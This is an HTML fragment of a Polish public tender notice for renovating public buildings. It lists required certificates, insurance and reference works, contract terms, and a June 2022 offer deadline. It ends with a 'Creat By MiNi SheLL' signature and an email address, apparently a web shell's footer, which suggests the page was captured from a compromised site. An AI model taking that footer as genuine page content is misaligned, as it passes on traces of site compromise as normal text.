prawa<br/>budowlanego i prawidłowo wykonali/ukończyli co najmniej jedno zadanie (zamówienie) które obejmowało remont budowę<br/>lub przebudowę budynku użyteczności publicznej o wartości min. 100 000,00 zł brutto.<br/>21.2. Zamawiający zastrzega możliwość weryfikacji potwierdzenia należytego wykonania prac bezpośrednio u podmiotu, na<br/>rzecz którego były wykonane.<br/>21.3. Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana metodą 0-1, tj. nie spełnia/ spełnia w<br/>oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 poz. 275), z innym wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – Załącznik nr 3 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>3) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności<br/>4) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust.<br/>1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia<br/>dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w<br/>postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności<br/>5) informacji z Krajowego Rejestru Karnego w zakresie:<br/>a) art. 108 ust. 1 pkt 1 i 2 ustawy Pzp,<br/>b) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>- sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>6) polisy tj. dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 200 000,00 zł (dwieście tysięcy złotych).<br/>7) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty – zgodnie z Załącznikiem nr 4 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1. sytuacji ekonomicznej lub finansowej dla części I i II:<br/>Wykonawca spełni warunek, jeśli wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej z tytułu prowadzonej działalności<br/>gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną wynoszącą co najmniej 200 000,00 zł (dwieście tysięcy<br/>złotych).<br/>2.zdolności technicznej lub zawodowej.<br/>dla części I i II:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie) przed upływem terminu składania ofert wykonali w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo<br/>wykonali/ukończyli co najmniej jedno zadanie (zamówienie) które obejmowało remont budowę lub przebudowę budynku<br/>użyteczności publicznej o wartości min. 100 000,00 zł brutto.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W zakresie regulowanym ustawą Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy elektronicznej https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com